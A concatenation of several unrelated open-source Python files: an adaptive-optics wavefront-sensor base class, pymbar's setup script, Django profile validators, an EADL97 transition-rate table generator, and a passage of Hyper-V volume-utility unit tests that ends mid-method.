As we are using a full WFS with focal plane making methods, the WFS base classes ``frame`` method can be used to take a frame from the WFS::
slopes = shWfs.frame(phaseScrnList)
All the data from that WFS frame is available for inspection. For instance, to obtain the electric field across the WFS and the image seen by the WFS detector::
EField = shWfs.EField
wfsDetector = shWfs.wfsDetectorPlane
Adding new WFSs
^^^^^^^^^^^^^^^
New WFS classes should inherit the ``WFS`` class, then create methods which deal with creating the focal plane and making a measurement from it. To make use of the base class's ``frame`` method, which will run the WFS entirely, the new class must contain the following methods::
calcFocalPlane(self)
integrateDetectorPlane(self)
readDetectorPlane(self)
calculateSlopes(self)
The final ``calculateSlopes`` method must set ``self.slopes`` to be the measurements made by the WFS. If LGS elongation is to be used for the new WFS, create a ``detectorPlane``, which is added to for each LGS elongation propagation. Have a look at the code for the ``Shack-Hartmann`` and experimental ``Pyramid`` WFSs to get some ideas on how to do this, and see the minimal skeleton sketched at the end of this module.
:Author:
Andrew Reeves
"""
import numpy
import numpy.random
import aotools
from .. import AOFFT, LGS, logger, lineofsight_legacy
# xrange now just "range" in python3.
# Following code means fastest implementation used in 2 and 3
try:
xrange
except NameError:
xrange = range
# The data type of data arrays (complex and real respectively)
CDTYPE = numpy.complex64
DTYPE = numpy.float32
RAD2ASEC = 206264.849159
ASEC2RAD = 1./RAD2ASEC
class WFS(object):
'''
A WFS class.
This is a base class which contains methods to initialise the WFS,
and calculate the phase across the WFSs input aperture, given the WFS
guide star geometry.
Parameters:
soapy_config (ConfigObj): The soapy configuration object
nWfs (int): The ID number of this WFS
        mask (ndarray, optional): An array of size (simConfig.simSize, simConfig.simSize) which is 1 at the telescope aperture and 0 elsewhere.
'''
def __init__(
self, soapy_config, n_wfs=0, mask=None):
self.soapy_config = soapy_config
        self.config = self.wfsConfig = soapy_config.wfss[n_wfs] # For compatibility
self.lgsConfig = self.config.lgs
# Sort out some required, static, parameters
self.pupil_size = self.soapy_config.sim.pupilSize
self.sim_size = self.soapy_config.sim.simSize
self.phase_scale = 1./self.soapy_config.sim.pxlScale
self.sim_pad = self.soapy_config.sim.simPad
self.screen_size = self.soapy_config.sim.scrnSize
self.telescope_diameter = self.soapy_config.tel.telDiam
self.wavelength = self.config.wavelength
self.threads = self.soapy_config.sim.threads
# If supplied use the mask
if numpy.any(mask):
self.mask = mask
# Else we'll just make a circle
else:
self.mask = aotools.circle(self.pupil_size/2., self.sim_size)
self.iMat = False
# Init the line of sight
self.initLos()
self.calcInitParams()
# If GS not at infinity, find meta-pupil radii for each layer
# if self.config.GSHeight != 0:
# self.radii = self.los.findMetaPupilSizes(self.config.GSHeight)
# else:
# self.radii = None
# Init LGS, FFTs and allocate some data arrays
self.initFFTs()
if self.lgsConfig and self.config.lgs:
self.initLGS()
self.allocDataArrays()
self.calcTiltCorrect()
self.getStatic()
# base WFS makes no measurements....
# self.n_measurements = 0
############################################################
# Initialisation routines
def setMask(self, mask):
"""
Sets the pupil mask as seen by the WFS.
This method can be called during a simulation
"""
# If supplied use the mask
if numpy.any(mask):
self.mask = mask
else:
self.mask = aotools.circle(
self.pupil_size/2., self.sim_size,
)
def calcInitParams(self, phaseSize=None):
self.los.calcInitParams(nx_out_pixels=phaseSize)
def initFFTs(self):
pass
def allocDataArrays(self):
pass
def initLos(self):
"""
Initialises the ``LineOfSight`` object, which gets the phase or EField in a given direction through turbulence.
"""
self.los = lineofsight_legacy.LineOfSight(
self.config, self.soapy_config,
propagationDirection="down")
def initLGS(self):
"""
Initialises the LGS objects for the WFS
Creates and initialises the LGS objects if the WFS GS is a LGS. This
        includes calculating the phase additions which are required if the
LGS is elongated based on the depth of the elongation and the launch
position. Note that if the GS is at infinity, elongation is not possible
and a warning is logged.
"""
# Choose the correct LGS object, either with physical or geometric
# or geometric propagation.
if self.lgsConfig.uplink:
lgsObj = eval("LGS.LGS_{}".format(self.lgsConfig.propagationMode))
self.lgs = lgsObj(self.config, self.soapy_config)
else:
self.lgs = None
self.lgsLaunchPos = None
self.elong = 0
self.elongLayers = 0
if self.config.lgs:
self.lgsLaunchPos = self.lgsConfig.launchPosition
# LGS Elongation##############################
if (self.config.GSHeight!=0 and
self.lgsConfig.elongationDepth!=0):
self.elong = self.lgsConfig.elongationDepth
self.elongLayers = self.lgsConfig.elongationLayers
# Get Heights of elong layers
self.elongHeights = numpy.linspace(
self.config.GSHeight-self.elong/2.,
self.config.GSHeight+self.elong/2.,
self.elongLayers
)
# Calculate the zernikes to add
self.elongZs = aotools.zernikeArray([2,3,4], self.pupil_size)
                # Calculate the radii of the metapupils for the different
                # elongation layer heights
# Also calculate the required phase addition for each layer
self.elongRadii = {}
self.elongPos = {}
self.elongPhaseAdditions = numpy.zeros(
(self.elongLayers, self.los.nx_out_pixels, self.los.nx_out_pixels))
for i in xrange(self.elongLayers):
self.elongRadii[i] = self.los.findMetaPupilSizes(
float(self.elongHeights[i]))
self.elongPhaseAdditions[i] = self.calcElongPhaseAddition(i)
self.elongPos[i] = self.calcElongPos(i)
# self.los.metaPupilPos = self.elongPos
logger.debug(
'Elong Meta Pupil Pos: {}'.format(self.los.metaPupilPos))
# If GS at infinity cant do elongation
elif (self.config.GSHeight==0 and
self.lgsConfig.elongationDepth!=0):
logger.warning("Not able to implement LGS Elongation as GS at infinity")
def calcTiltCorrect(self):
pass
def getStatic(self):
self.staticData = None
def calcElongPhaseAddition(self, elongLayer):
"""
Calculates the phase required to emulate layers on an elongated source
For each 'elongation layer' a phase addition is calculated which
accounts for the difference in height from the nominal GS height where
the WFS is focussed, and accounts for the tilt seen if the LGS is
launched off-axis.
Parameters:
elongLayer (int): The number of the elongation layer
Returns:
ndarray: The phase addition required for that layer.
"""
# Calculate the path difference between the central GS height and the
# elongation "layer"
# Define these to make it easier
h = self.elongHeights[elongLayer]
dh = h - self.config.GSHeight
H = float(self.lgsConfig.height)
d = numpy.array(self.lgsLaunchPos).astype('float32') * self.los.telDiam/2.
D = self.telescope_diameter
theta = (d.astype("float")/H) - self.config.GSPosition
# for the focus terms....
focalPathDiff = (2*numpy.pi/self.wfsConfig.wavelength) * ((
((self.telescope_diameter/2.)**2 + (h**2) )**0.5\
- ((self.telescope_diameter/2.)**2 + (H)**2 )**0.5 ) - dh)
# For tilt terms.....
tiltPathDiff = (2*numpy.pi/self.wfsConfig.wavelength) * (
numpy.sqrt( (dh+H)**2. + ( (dh+H)*theta-d-D/2.)**2 )
+ numpy.sqrt( H**2 + (D/2. - d + H*theta)**2 )
- numpy.sqrt( H**2 + (H*theta - d - D/2.)**2)
- numpy.sqrt( (dh+H)**2 + (D/2. - d + (dh+H)*theta )**2))
phaseAddition = numpy.zeros(
(self.pupil_size, self.pupil_size))
phaseAddition +=((self.elongZs[2]/self.elongZs[2].max())
* focalPathDiff )
# X,Y tilt
phaseAddition += ((self.elongZs[0]/self.elongZs[0].max())
*tiltPathDiff[0] )
phaseAddition += ((self.elongZs[1]/self.elongZs[1].max()) *tiltPathDiff[1])
# Pad from pupilSize to simSize
pad = ((self.sim_pad,)*2, (self.sim_pad,)*2)
phaseAddition = numpy.pad(phaseAddition, pad, mode="constant")
phaseAddition = interp.zoom(phaseAddition, self.los.nx_out_pixels)
return phaseAddition
def calcElongPos(self, elongLayer):
"""
Calculates the difference in GS position for each elongation layer
only makes a difference if LGS launched off-axis
Parameters:
elongLayer (int): which elongation layer
Returns:
float: The effective position of that layer GS on the simulation phase grid
"""
h = self.elongHeights[elongLayer] # height of elonglayer
dh = h - self.config.GSHeight # delta height from GS Height
H = float(self.config.GSHeight) # Height of GS
# Position of launch in m
xl = numpy.array(self.lgsLaunchPos) * self.telescope_diameter/2.
# GS Pos in radians
GSPos = numpy.array(self.config.GSPosition) * RAD2ASEC
# difference in angular Pos for that height layer in rads
theta_n = GSPos - ((dh*xl)/ (H*(H+dh)))
# metres from on-axis point of each elongation point
elongPos = (GSPos + theta_n) * RAD2ASEC
return elongPos
def zeroPhaseData(self):
self.los.EField[:] = 0
self.los.phase[:] = 0
def makeElongationFrame(self, correction=None):
"""
Find the focal plane resulting from an elongated guide star, such as LGS.
        Runs the phase stacking and propagation routines multiple times with different GS heights, positions and/or aberrations to simulate the effect of a number of points in an elongated guide star.
"""
# Loop over the elongation layers
for i in xrange(self.elongLayers):
logger.debug('Elong layer: {}'.format(i))
# Reset the phase propagation routines (not the detector though)
self.zeroData(FP=False)
# Find the phase from that elongation layer (with different cone effect radii and potentially angular position)
self.los.makePhase(self.elongRadii[i], apos=self.elongPos[i])
# Make a copy of the uncorrectedPhase for plotting
self.uncorrectedPhase = self.los.phase.copy()/self.los.phs2Rad
# Add the effect of the defocus and possibly tilt
self.los.EField *= numpy.exp(1j*self.elongPhaseAdditions[i])
self.los.phase += self.elongPhaseAdditions[i]
# Apply any correction
if correction is not None:
self.los.performCorrection(correction)
# Add onto the focal plane with that layers intensity
self.calcFocalPlane(intensity=self.lgsConfig.naProfile[i])
def frame(self, scrns, phase_correction=None, read=True, iMatFrame=False):
'''
Runs one WFS frame
Runs a single frame of the WFS with a given set of phase screens and
some optional correction. If elongation is set, will run the phase
calculating and focal plane making methods multiple times for a few
different heights of LGS, then sum these onto a ``wfsDetectorPlane``.
Parameters:
scrns (list): A list or dict containing the phase screens
            phase_correction (ndarray, optional): The correction term to take from the phase screens before the WFS is run.
read (bool, optional): Should the WFS be read out? if False, then WFS image is calculated but slopes not calculated. defaults to True.
iMatFrame (bool, optional): If True, will assume an interaction matrix is being measured. Turns off some AO loop features before running
Returns:
ndarray: WFS Measurements
'''
#If iMatFrame, turn off unwanted effects
if iMatFrame:
self.iMat = True
removeTT = self.config.removeTT
self.config.removeTT = False
photonNoise = self.config.photonNoise
self.config.photonNoise = False
eReadNoise = self.config.eReadNoise
self.config.eReadNoise = 0
self.zeroData(detector=read, FP=False)
self.los.frame(scrns)
# If LGS elongation simulated
if self.config.lgs and self.elong!=0:
self.makeElongationFrame(phase_correction)
# If no elongation
else:
self.uncorrectedPhase = self.los.phase.copy()/self.los.phs2Rad
if phase_correction is not None:
self.los.performCorrection(phase_correction)
self.calcFocalPlane()
self.integrateDetectorPlane()
if read:
self.readDetectorPlane()
self.calculateSlopes()
self.zeroData(detector=False)
# Turn back on stuff disabled for iMat
if iMatFrame:
self.iMat=False
self.config.removeTT = removeTT
self.config.photonNoise = photonNoise
self.config.eReadNoise = eReadNoise
        # Check that slopes aren't NaNs; set them to 0 if so
# if numpy.any(numpy.isnan(self.slopes)):
# self.slopes[:] = 0
if numpy.any(numpy.isnan(self.slopes)):
            self.slopes[:] = numpy.nan_to_num(self.slopes)
if read:
return self.slopes
else:
return numpy.zeros((self.n_measurements), dtype=float)
def simple_frame(self, phase, iMatFrame=False):
"""
        Runs a simple WFS frame with no Line of Sight propagation
        The WFS is run by simply getting the measurements relating to a
        2d phase pattern. This does not account for the altitude of the
turbulence, or for correction applied by a DM.
Parameters:
phase (ndarray): array of phase of size scrnSize x scrnSize in nm
Returns:
ndarray: WFS measurements
"""
self.zeroData()
#If iMatFrame, turn off unwanted effects
if iMatFrame:
self.iMat = True
removeTT = self.config.removeTT
self.config.removeTT = False
photonNoise = self.config.photonNoise
self.config.photonNoise = False
eReadNoise = self.config.eReadNoise
self.config.eReadNoise = 0
self.los.phase = phase * self.los.phs2Rad
self.calcFocalPlane()
self.integrateDetectorPlane()
self.readDetectorPlane()
self.calculateSlopes()
# Turn back on stuff disabled for iMat
if iMatFrame:
self.iMat=False
self.config.removeTT = removeTT
self.config.photonNoise = photonNoise
self.config.eReadNoise = eReadNoise
        # Check that slopes aren't NaNs; set them to 0 if so
# if numpy.any(numpy.isnan(self.slopes)):
# self.slopes[:] = 0
if numpy.any(numpy.isnan(self.slopes)):
            self.slopes[:] = numpy.nan_to_num(self.slopes)
return self.slopes
def addPhotonNoise(self):
"""
Add photon noise to ``wfsDetectorPlane`` using ``numpy.random.poisson``
"""
self.wfsDetectorPlane = numpy.random.poisson(
self.wfsDetectorPlane).astype(DTYPE)
def addReadNoise(self):
"""
        Adds read noise to ``wfsDetectorPlane`` using ``numpy.random.normal``.
        This generates a normal (gaussian) distribution of random numbers to
add to the detector. Any CCD bias is assumed to have been removed, so
the distribution is centred around 0. The width of the distribution
is determined by the value `eReadNoise` set in the WFS configuration.
"""
self.wfsDetectorPlane += numpy.random.normal(
0, self.config.eReadNoise, self.wfsDetectorPlane.shape
)
def calcFocalPlane(self, intensity=None):
pass
def integrateDetectorPlane(self):
pass
def readDetectorPlane(self):
pass
def LGSUplink(self):
pass
def calculateSlopes(self):
self.slopes = self.los.EField
def zeroData(self, detector=True, FP=True):
#self.zeroPhaseData()
pass
@property
def EField(self):
return self.los.EField
@EField.setter
def EField(self, EField):
self.los.EField = EField
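# Editor's note: a hedged, minimal sketch (not part of soapy) illustrating the
# "Adding new WFSs" section of the module docstring above. All names other
# than the four required methods are illustrative assumptions.
class _ExampleWFS(WFS):
    """Skeleton WFS subclass satisfying the base-class ``frame`` interface."""
    def calcFocalPlane(self, intensity=None):
        # Turn the line-of-sight EField into a focal-plane intensity pattern
        self.focalPlane = numpy.abs(self.los.EField)**2
    def integrateDetectorPlane(self):
        # Accumulate the focal plane onto the detector (no noise modelled here)
        self.detectorPlane = self.focalPlane
    def readDetectorPlane(self):
        # Read out the integrated detector image
        self.wfsDetectorPlane = self.detectorPlane
    def calculateSlopes(self):
        # ``slopes`` must hold the measurements returned by ``frame``
        self.slopes = self.wfsDetectorPlane.flatten()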
|
gpl-3.0
|
choderalab/pymbar
|
setup.py
|
2
|
5204
|
"""
The pymbar package contains the pymbar suite of tools for the analysis of
simulated and experimental data with the multistate Bennett acceptance
ratio (MBAR) estimator.
"""
from distutils.core import setup
from setuptools import setup, Extension
import numpy
import os
import subprocess
import six
##########################
VERSION = "3.0.5"
ISRELEASED = False
__version__ = VERSION
##########################
################################################################################
# Writing version control information to the module
################################################################################
def git_version():
# Return the git revision as a string
# copied from numpy setup.py
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = 'Unknown'
return GIT_REVISION
def write_version_py(filename='pymbar/version.py'):
cnt = """
# This file is automatically generated by setup.py
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
# Adding the git rev number needs to be done inside write_version_py(),
# otherwise the import of numpy.version messes up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
else:
GIT_REVISION = 'Unknown'
if not ISRELEASED:
FULLVERSION += '.dev-' + GIT_REVISION[:7]
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version': FULLVERSION,
'git_revision': GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
################################################################################
# Installation
################################################################################
write_version_py()
CMBAR = Extension('_pymbar',
sources = ["pymbar/_pymbar.c"],
extra_compile_args=["-std=c99","-O2","-shared","-msse2","-msse3"],
include_dirs = [numpy.get_include(),numpy.get_include()+"/numpy/"]
)
def buildKeywordDictionary():
from distutils.core import Extension
setupKeywords = {}
setupKeywords["name"] = "pymbar"
setupKeywords["version"] = VERSION
setupKeywords["author"] = "Levi N. Naden and Michael R. Shirts and John D. Chodera"
setupKeywords["author_email"] = "levi.naden@choderalab.org, michael.shirts@virginia.edu, john.chodera@choderalab.org"
setupKeywords["license"] = "MIT"
setupKeywords["url"] = "http://github.com/choderalab/pymbar"
setupKeywords["download_url"] = "http://github.com/choderalab/pymbar"
setupKeywords["packages"] = ['pymbar', 'pymbar.testsystems', 'pymbar.tests']
setupKeywords["package_dir"] = {'pymbar' : 'pymbar', 'pymbar.tests' : 'pymbar/tests'}
setupKeywords["zip_safe"] = False
#setupKeywords["py_modules"] = ["pymbar", "timeseries", "testsystems", "confidenceintervals"]
setupKeywords["data_files"] = [('pymbar', ["pymbar/_pymbar.c"])] # Ensures the _pymbar.c files are shipped regardless of Py Version
setupKeywords["ext_modules"] = [CMBAR] if six.PY2 else []
# setupKeywords["test_suite"] = "tests" # requires we migrate to setuptools
setupKeywords["platforms"] = ["Linux", "Mac OS X", "Windows"]
setupKeywords["description"] = "Python implementation of the multistate Bennett acceptance ratio (MBAR) method."
setupKeywords["requires"] = ["numpy", "scipy", "nose", "numexpr"]
setupKeywords["long_description"] = """
Pymbar (https://simtk.org/home/pymbar) is a library
that provides tools for optimally combining simulations
from multiple thermodynamic states using maximum likelihood
methods to compute free energies (normalization constants)
and expectation values from all of the samples simultaneously.
"""
outputString=""
firstTab = 40
secondTab = 60
for key in sorted(setupKeywords.keys()):
value = setupKeywords[key]
outputString += key.rjust(firstTab) + str( value ).rjust(secondTab) + "\n"
print("%s" % outputString)
#get_config_var(None) # this line is necessary to fix the imports Mac OS X
return setupKeywords
def main():
setupKeywords = buildKeywordDictionary()
setup(**setupKeywords)
if __name__ == '__main__':
main()
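# Editor's note: a hedged illustration (the hash below is made up). For a
# non-release build, write_version_py() above generates a pymbar/version.py
# with roughly this content, where the short git hash is appended to the
# development version string:
#
#     short_version = '3.0.5'
#     version = '3.0.5'
#     full_version = '3.0.5.dev-0123abc'
#     git_revision = '0123abc...full 40-character hash...'
#     release = False
#     if not release:
#         version = full_version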
|
mit
|
akatsoulas/mozillians
|
mozillians/phonebook/validators.py
|
2
|
3254
|
import re
from django.apps import apps
from django.core.validators import EmailValidator, URLValidator
from django.forms import ValidationError
from django.utils.translation import ugettext as _
def validate_twitter(username):
"""Return a twitter username given '@' or http(s) strings."""
if username:
username = re.sub(r'https?://(www\.)?twitter\.com/|@', '', username)
# Twitter accounts must be alphanumeric ASCII including underscore, and <= 15 chars.
# https://support.twitter.com/articles/101299-why-can-t-i-register-certain-usernames
if len(username) > 15:
raise ValidationError(_('Twitter usernames cannot be longer than 15 characters.'))
if not re.match(r'^\w+$', username):
raise ValidationError(_('Twitter usernames must contain only alphanumeric'
' characters and the underscore.'))
return username
def validate_linkedin(url):
"""Return the linkedin username from the url or the link"""
if 'view?id' not in url:
nick = url.rsplit('/', 1)[-1]
return nick
return url
def validate_username(username):
"""Validate username.
Import modules here to prevent dependency breaking.
"""
username = username.lower()
UsernameBlacklist = apps.get_model('users', 'UsernameBlacklist')
if UsernameBlacklist.objects.filter(value=username, is_regex=False).exists():
return False
for regex_value in UsernameBlacklist.objects.filter(is_regex=True):
if re.match(regex_value.value, username):
return False
return True
def validate_website(url):
"""Validate and return a properly formatted website url."""
validate_url = URLValidator()
if url and '://' not in url:
url = u'http://%s' % url
try:
validate_url(url)
except ValidationError:
raise ValidationError(_('Enter a valid URL.'))
return url
def validate_username_not_url(username):
"""Validate that a username is not a URL."""
if username.startswith('http://') or username.startswith('https://'):
raise ValidationError(_('This field requires an identifier, not a URL.'))
return username
def validate_email(value):
"""Validate that a username is email like."""
_validate_email = EmailValidator()
try:
_validate_email(value)
except ValidationError:
raise ValidationError(_('Enter a valid email address.'))
return value
def validate_phone_number(value):
"""Validate that a phone number is in international format. (5-15 characters)."""
value = value.replace(' ', '')
value = re.sub(r'^00', '+', value)
# Ensure that there are 5 to 15 digits
pattern = re.compile(r'^\+\d{5,15}$')
if not pattern.match(value):
raise ValidationError(_('Please enter a valid phone number in international format '
'(e.g. +1 555 555 5555)'))
return value
def validate_discord(value):
"""Validate that a username matches the Discord format of <username>#0000."""
if not re.match(r'^.+#[0-9]{4}$', value):
raise ValidationError(_('Expecting a Discord username with tag (e.g. mozillian#0001)'))
return value
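# Editor's note: a hedged usage sketch (not part of mozillians) showing the
# expected behaviour of the validators above on a few illustrative inputs.
# It assumes a configured Django environment and is never called here.
def _example_validator_usage():
    assert validate_twitter('https://twitter.com/mozillians') == 'mozillians'
    assert validate_twitter('@mozillians') == 'mozillians'
    assert validate_phone_number('00 1 555 555 5555') == '+15555555555'
    assert validate_website('mozillians.org') == 'http://mozillians.org'
    assert validate_linkedin('https://www.linkedin.com/in/example') == 'example'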
|
bsd-3-clause
|
tonnrueter/pymca_devel
|
PyMca/EPDL97/GenerateEADLShellNonradiativeRates.py
|
1
|
6235
|
__doc__= "Generate specfiles with EADL97 shell transition probabilities"
import os
import sys
import EADLParser
Elements = ['H', 'He',
'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne',
'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe',
'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo',
'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn',
'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce',
'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy',
'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb',
'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th',
'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf',
'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt']
def getHeader(filename):
text = '#F %s\n' % filename
text += '#U00 This file is a conversion to specfile format of \n'
text += '#U01 directly extracted EADL97 nonradiative transition probabilities.\n'
text += '#U02 EADL itself can be found at:\n'
text += '#U03 http://www-nds.iaea.org/epdl97/libsall.htm\n'
text += '#U04 The code used to generate this file has been:\n'
text += '#U05 %s\n' % os.path.basename(__file__)
text += '#U06\n'
text += '\n'
return text
shellList = EADLParser.getBaseShellList()
workingShells = ['K', 'L1', 'L2', 'L3', 'M1', 'M2', 'M3', 'M4', 'M5']
for shell in workingShells:
fname = "EADL97_%sShellNonradiativeRates.dat" % shell[0]
print("fname = %s" % fname)
if shell in ['K', 'L1', 'M1']:
if os.path.exists(fname):
os.remove(fname)
nscan = 0
outfile = open(fname, 'wb')
tmpText = getHeader(fname)
if sys.version < '3.0':
outfile.write(tmpText)
else:
outfile.write(tmpText.encode('UTF-8'))
nscan += 1
for i in range(1,101):
print("Z = %d, Element = %s" % (i, Elements[i-1]))
element = Elements[i-1]
ddict = {}
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
if shell in [key0.split()[0], key1.split()[0]]:
continue
ddict[key] = [0.0, 0.0]
try:
ddict = EADLParser.getNonradiativeTransitionProbabilities(\
Elements.index(element)+1,
shell=shell)
print("%s Shell nonradiative emission probabilities " % shell)
except IOError:
            # This happens when reading elements that do not present these transitions
pass
#continue
if i == 1:
#generate the labels
nTransitions = 0
tmpText = '#L Z TOTAL'
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
tmpText += ' %s' % (key)
nTransitions += 1
text = '#S %d %s-Shell nonradiative rates\n' % (nscan, shell)
text += '#N %d\n' % (2 + nTransitions)
text += tmpText + '\n'
else:
text = ''
        # this loop calculates the totals, because the total cannot be deduced
        # from the subset of transitions written in the file
total = 0.0
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
total += ddict.get(key, [0.0, 0.0])[0]
text += '%d %.7E' % (i, total)
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
valueToWrite = ddict.get(key, [0.0, 0.0])[0]
if valueToWrite == 0.0:
text += ' 0.0'
else:
text += ' %.7E' % valueToWrite
text += '\n'
if sys.version < '3.0':
outfile.write(text)
else:
outfile.write(text.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
outfile.close()
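# Editor's note: a hedged illustration (column names and values are made up).
# Each element processed above becomes one data row of a specfile scan whose
# header has roughly this shape:
#
#     #S 1 K-Shell nonradiative rates
#     #N <2 + number of transition columns>
#     #L Z TOTAL K-L1L1 K-L1L2 K-L1L3 ...
#     <Z> <summed probability> <one probability per transition column> ...
#
# i.e. the atomic number, the total computed in the loop above, then one
# column per shell-pair transition in the order built by the label loop.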
|
gpl-2.0
|
cloudbase/nova-virtualbox
|
nova/tests/unit/virt/hyperv/test_basevolumeutils.py
|
67
|
7839
|
# Copyright 2014 Cloudbase Solutions Srl
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import test
from nova.virt.hyperv import basevolumeutils
def _exception_thrower():
raise Exception("Testing exception handling.")
class BaseVolumeUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V BaseVolumeUtils class."""
_FAKE_COMPUTER_NAME = "fake_computer_name"
_FAKE_DOMAIN_NAME = "fake_domain_name"
_FAKE_INITIATOR_NAME = "fake_initiator_name"
_FAKE_INITIATOR_IQN_NAME = "iqn.1991-05.com.microsoft:fake_computer_name"
_FAKE_DISK_PATH = 'fake_path DeviceID="123\\\\2"'
_FAKE_MOUNT_DEVICE = '/dev/fake/mount'
_FAKE_DEVICE_NAME = '/dev/fake/path'
_FAKE_SWAP = {'device_name': _FAKE_DISK_PATH}
def setUp(self):
self._volutils = basevolumeutils.BaseVolumeUtils()
self._volutils._conn_wmi = mock.MagicMock()
self._volutils._conn_cimv2 = mock.MagicMock()
super(BaseVolumeUtilsTestCase, self).setUp()
def test_get_iscsi_initiator_ok(self):
self._check_get_iscsi_initiator(
mock.MagicMock(return_value=mock.sentinel.FAKE_KEY),
self._FAKE_INITIATOR_NAME)
def test_get_iscsi_initiator_exception(self):
initiator_name = "%(iqn)s.%(domain)s" % {
'iqn': self._FAKE_INITIATOR_IQN_NAME,
'domain': self._FAKE_DOMAIN_NAME
}
self._check_get_iscsi_initiator(_exception_thrower, initiator_name)
def _check_get_iscsi_initiator(self, winreg_method, expected):
mock_computer = mock.MagicMock()
mock_computer.name = self._FAKE_COMPUTER_NAME
mock_computer.Domain = self._FAKE_DOMAIN_NAME
self._volutils._conn_cimv2.Win32_ComputerSystem.return_value = [
mock_computer]
with mock.patch.object(basevolumeutils,
'_winreg', create=True) as mock_winreg:
mock_winreg.OpenKey = winreg_method
mock_winreg.QueryValueEx = mock.MagicMock(return_value=[expected])
initiator_name = self._volutils.get_iscsi_initiator()
self.assertEqual(expected, initiator_name)
@mock.patch.object(basevolumeutils, 'driver')
def test_volume_in_mapping(self, mock_driver):
mock_driver.block_device_info_get_mapping.return_value = [
{'mount_device': self._FAKE_MOUNT_DEVICE}]
mock_driver.block_device_info_get_swap = mock.MagicMock(
return_value=self._FAKE_SWAP)
mock_driver.block_device_info_get_ephemerals = mock.MagicMock(
return_value=[{'device_name': self._FAKE_DEVICE_NAME}])
mock_driver.swap_is_usable = mock.MagicMock(return_value=True)
self.assertTrue(self._volutils.volume_in_mapping(
self._FAKE_MOUNT_DEVICE, mock.sentinel.FAKE_BLOCK_DEVICE_INFO))
def test_get_drive_number_from_disk_path(self):
fake_disk_path = (
'\\\\WIN-I5BTVHOIFGK\\root\\virtualization\\v2:Msvm_DiskDrive.'
'CreationClassName="Msvm_DiskDrive",DeviceID="Microsoft:353B3BE8-'
'310C-4cf4-839E-4E1B14616136\\\\1",SystemCreationClassName='
'"Msvm_ComputerSystem",SystemName="WIN-I5BTVHOIFGK"')
expected_disk_number = 1
ret_val = self._volutils._get_drive_number_from_disk_path(
fake_disk_path)
self.assertEqual(expected_disk_number, ret_val)
def test_get_drive_number_not_found(self):
fake_disk_path = 'fake_disk_path'
ret_val = self._volutils._get_drive_number_from_disk_path(
fake_disk_path)
self.assertFalse(ret_val)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
"_get_drive_number_from_disk_path")
def test_get_session_id_from_mounted_disk(self, mock_get_session_id):
mock_get_session_id.return_value = mock.sentinel.FAKE_DEVICE_NUMBER
mock_initiator_session = self._create_initiator_session()
